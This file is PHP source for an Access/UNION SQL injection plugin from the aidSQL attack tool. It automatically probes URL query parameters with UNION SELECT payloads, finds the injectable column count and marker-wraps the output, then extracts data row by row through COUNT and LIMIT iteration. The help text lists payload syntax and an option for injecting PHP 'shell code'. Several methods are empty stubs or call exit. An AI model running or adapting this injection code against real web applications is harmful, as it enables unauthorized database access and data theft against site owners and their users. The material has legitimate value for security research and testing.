<?php

	namespace aidSQL\plugin\sqli {

		class Access extends InjectionPlugin {

			const		PLUGIN_NAME						= "UNION";
			const		PLUGIN_AUTHOR					= "Federico Stange y Maximiliano Monti";

			private	$_affectedDatabases			=	array("access");
			private	$_strRepeat						=	100;
			private	$_repeatCharacter				=	"a";
			private	$_fields							=	array();
			private	$_vulnerableIndex				=	0;
			private	$_fieldWrapping				=	NULL;


			public function injectionUnionWithConcat(){

				$queryBuilder	=	new \aidSQL\db\MySQLQueryBuilder();
				$this->setQueryBuilder($queryBuilder);

				$parser	=	new \aidSQL\parser\Generic();

				$openTag				=	"'<_>'";
				$closeTag			=	"'</_>'";
				
				$hexOpen				=	$openTag;
				$hexClose			=	$closeTag;

				$parser->setOpenTag($openTag);
				$parser->setCloseTag($closeTag);
				$parser->setLog($this->_logger);

				$this->setParser($parser);

				$offset	=	(isset($this->_config["start-offset"])) ? (int)$this->_config["start-offset"] : 1;

				if(!$offset){

					throw(new \Exception("Start offset should be an integer greater than 0!"));

				}

				$sqliParams	=	array(
					"space-char"		=>	" ",
					"field-payloads"	=>	explode('_',$this->_config["field-payloads"]),
					"ending-payloads"	=>	array(
						"comment"=>explode('_',$this->_config["comment-payloads"]),
						"order"=>array(
//							array("by"=>"1","sort"=>"DESC"),
//							array("by"=>"1","sort"=>"ASC"),
							array()
						),
						"limit"=>array(
							array()
	//						array("0","1"),
	//						array("1","1"),
						)
					)
				);


				if(array_key_exists("start-offset",$this->_config)){

					$offset	=	((int)$this->_config["start-offset"])	?	$this->_config["start-offset"]	:	1;

				}

				$this->detectUnionInjection(
														$sqliParams,"unionQuery",
														$this->concat(Array($hexOpen,"%value%",$hexClose)),
														$offset
				);

				if(sizeof($this->_injection)){

					return TRUE;

				}

				return FALSE;

			}

			private function concat(Array $array){

				return implode('&',$array);

			}

			private function wrap($wrapping,$value){

				return preg_replace("/%value%/",$value,$wrapping);

			}

			private function wrapArray(Array $wrapMe,$wrapping){

				$return	=	array();

				foreach($wrapMe as $key=>$wrapIt){

					$return[]	=	$this->wrap($wrapping,$wrapIt);

				}

				return $return;

			}

			private function checkUnionInjectionParameters(Array &$sqliParams){

				if(!isset($sqliParams["field-payloads"])||!is_array($sqliParams["field-payloads"])){
					throw(new \Exception("Invalid field payloads!"));
				}

				if(!isset($sqliParams["ending-payloads"])||!is_array($sqliParams["ending-payloads"])){

					throw(new \Exception("Invalid ending payloads!"));

					if(!isset($sqliParams["comment"])||!is_array($sqliParams["comment"])){

						throw(new \Exception("Comment payloads key inside the ending-payloads array should be an array!"));

					}elseif(!isset($sqliParams["order"])){

						$sqliParams["order"]	=	array();

					}elseif(!isset($sqliParams["limit"])){

						$sqliParams["limit"]	=	array();

					}

				}

			}

			private function makeImpossibleValue($value){

				if(is_numeric($value)){
					return -1;
				}

				return md5(rand()*time());

			}

			private function detectUnionInjection(Array $sqliParams,$callback=NULL,$wrapping=NULL,$offset=1,$value=NULL){

				$this->checkUnionInjectionParameters($sqliParams);

				$requestVariables	=	$this->_httpAdapter->getUrl()->getQueryAsArray();

				foreach($requestVariables as $requestVariable=>$requestVariableValue){

					if($this->isIgnoredRequestVariable($requestVariable,$requestVariableValue)){
						continue;
					}

					$iterationContainer	=	array();

					if($offset>1){

						for($i=0;$i<$offset;$i++){
							$iterationContainer[]	=	$i;
						}

					}

					for($maxFields=$offset;$maxFields<=$this->_injectionAttempts;$maxFields++){

						$iterationContainer[]	=	(!empty($value))	?	$value	:	$maxFields;

						foreach($sqliParams["field-payloads"] as $payLoad){

							foreach($sqliParams["ending-payloads"]["comment"] as $comment) {

								foreach($sqliParams["ending-payloads"]["order"] as $order){

									foreach($sqliParams["ending-payloads"]["limit"] as $limit){

										if(!empty($wrapping)){
											$values	=	$this->wrapArray($iterationContainer,$wrapping);
										}else{
											$values	=	$iterationContainer;
										}

										$this->_queryBuilder->setCommentOpen($comment);
										$this->_queryBuilder->union($values,"ALL");

										if(sizeof($order)){

											$this->_queryBuilder->orderBy($order["by"],$order["sort"]);

										}

										if(sizeof($limit)){

											$this->_queryBuilder->limit($limit);

										}

										$space			=	$this->_queryBuilder->getSpaceCharacter();

										$madeUpValue	=	$this->makeImpossibleValue($requestVariableValue);

										$sql				=	$madeUpValue.$payLoad.
																$space.$this->_queryBuilder->getSQL().$comment;

										$this->_queryBuilder->setSQL($sql);

										$result	=	$this->query($requestVariable,$callback);

										if($result){

											foreach($requestVariables as $key=>$rV){
												if($key == $requestVariable){
													unset($requestVariables[$key]);
												}
											}

											$injectionParameters	=	array(
																				"index"						=>	$maxFields,	
																				"fieldValues"				=>	$iterationContainer,
																				"requestVariable"			=>	$requestVariable,
																				"requestValue"				=>	$madeUpValue,
																				"requestVariables"		=> $requestVariables,
																				"wrapping"					=>	$wrapping,
																				"payload"					=>	$payLoad,		//constant
																				"limit"						=>	$limit,			//variable 
																				"order"						=>	$order,			//variable
																				"comment"					=>	$comment,		//constant
																				"callback"					=>	$callback,
																				"affectedQueryField"		=> $result[0]
											);

											$this->setInjectionParameters($injectionParameters);

											$this->_payload	=	$payLoad;

											return TRUE;

										}

									}	//limit

								}	//order

							}	//comment

							$url	=	$this->_httpAdapter->getUrl();
							$url->addRequestVariable($requestVariable,$value); 
							$this->_httpAdapter->setUrl($url);

						}	//field-payload

					}	//maxfields

				}	//requestVariables

				return FALSE;

			}

			/**
			*This method creates the injection string it uses $this->_injection parameters in order
			*to make the injection string. 
			*/

			private function buildUnionInjection($value,$from=NULL,Array $where=array(),Array $group=array()){

				$params	=	$this->_injection;

				foreach($params["fieldValues"] as $key=>&$val){

					//FIX ME
					if($val==$this->_injection["affectedQueryField"]){

						$val	=	$this->wrap($params["wrapping"],$value);	

					}

				}

				$this->_queryBuilder->union($params["fieldValues"],"ALL");

				if(!is_null($from)){
					$this->_queryBuilder->from($from);
				}

				if(sizeof($where)){
					$this->_queryBuilder->where($where);
				}

				if(sizeof($group)){
					$this->_queryBuilder->group($group);
				}

				if(isset($params["order"]["by"])){
					$this->_queryBuilder->orderBy($params["order"]["by"],$params["order"]["sort"]);
				}

				if(isset($params["limit"])){
					if(is_array($params["limit"])&&sizeof($params["limit"])){
						$this->_queryBuilder->limit($params["limit"]);
					}
				}

			}

			/**
			*This method creates the injection string through the buildUnionInjection method and executes the query
			*/

			public function unionQuery($value,$from=NULL,Array $where=array(),Array $group=array()){
				
				$this->buildUnionInjection($value,$from,$where,$group);

				$params	=	$this->_injection;
				$sql		=	$this->_queryBuilder->getSQL();
				$sql		=	$params["requestValue"].$params["payload"].$this->_queryBuilder->getSpaceCharacter().$sql.$params["comment"];
				$this->_queryBuilder->setSQL($sql);
				return parent::query($params["requestVariable"],__FUNCTION__);

			}

			public function getAffectedDatabases(){

				return $this->_affectedDatabases;

			}


			public function count($value,$from=NULL,Array $where=array(),Array $group=array(),$count=NULL){

				return $this->unionQuery("COUNT($value)",$from,$where,$group);
					
			}

			//Suppose you have detected truncated data, well, bad luck.
			//Hopefully we can count the registers and do a limit iteration	
			//through that :)

			public function unionQueryIterateLimit($value,$from=NULL,Array $where=array(),Array $group=array(),$count=NULL){

				if(is_null($count)){

					$count	=	$this->unionQuery("COUNT($value)",$from,$where,$group);
					$count	=	$count[0];
					$this->log("GOT REGISTRY COUNT = $count",0,"light_cyan");

				}

				if(isset($this->_injection["limit"])){
					$restoreLimit	=	$this->_injection["limit"];
				}

				$results			=	array();

				for($i=0;$i<=$count;$i++){

					$this->_injection["limit"]	=	array($i,1);
					$result			=	$this->unionQuery($value,$from,$where,$group);	
					$results[$i]	=	$result[0];

				}

				if(isset($this->_injection["limit"])&&isset($restoreLimit)){
					$this->_injection["limit"]	=	$restoreLimit;
				}

				return $results;

			}


			public function getSchemas(){

				exit("getSchemas");

			}

			public function getSingleSchema($database,$version,$user){


			}
			

			public function getColumns($table=NULL,$database=NULL){

			}

			public function getUser(){

			}

			public function getVersion(){

			}

			public function getDatadir(){

			}

			public function isRoot($user=NULL){
			
			}

			private function checkPrivilege($user,$privilege="FILE"){

			}


			public function getShell(\aidSQL\core\PluginLoader &$pLoader,\aidSQL\http\crawler &$crawler){

				return FALSE;

			}


			public static function getHelp(\aidSQL\core\Logger $logger){

				$logger->log("--sqli-access-injection-attempts\tAt how many attempts shall we stop trying");
				$logger->log("--sqli-access-start-offset\t\t<integer>Start the UNION injection at this offset (if you know what youre doing)");
				$logger->log("--sqli-access-var-count\t\t<integer> Try this amount of variables per link");
				$logger->log("--sqli-numeric-only\t\t\tOnly try to perform injection on integer fields");
				$logger->log("--sqli-access-strings-only\t\tOnly try to perform injection on string fields");
				$logger->log("--sqli-access-field-payloads\t\tSet field payloads delimited by _\ti.e: _'_')_%)");
				$logger->log("--sqli-access-ending-payloads\t\tSet ending payloads delimited by _\ti.e: LIMIT 1,1_ORDER BY 1");
				$logger->log("--sqli-access-comment-payloads\t\tSet comment payloads delimited by _\ti.e: #_/*_--");
				$logger->log("--sqli-access-shell-code\tPut your favorite shell code here i.e ".'<?php var_dump($_SERVER);?>');

			}

		}

	}
?>
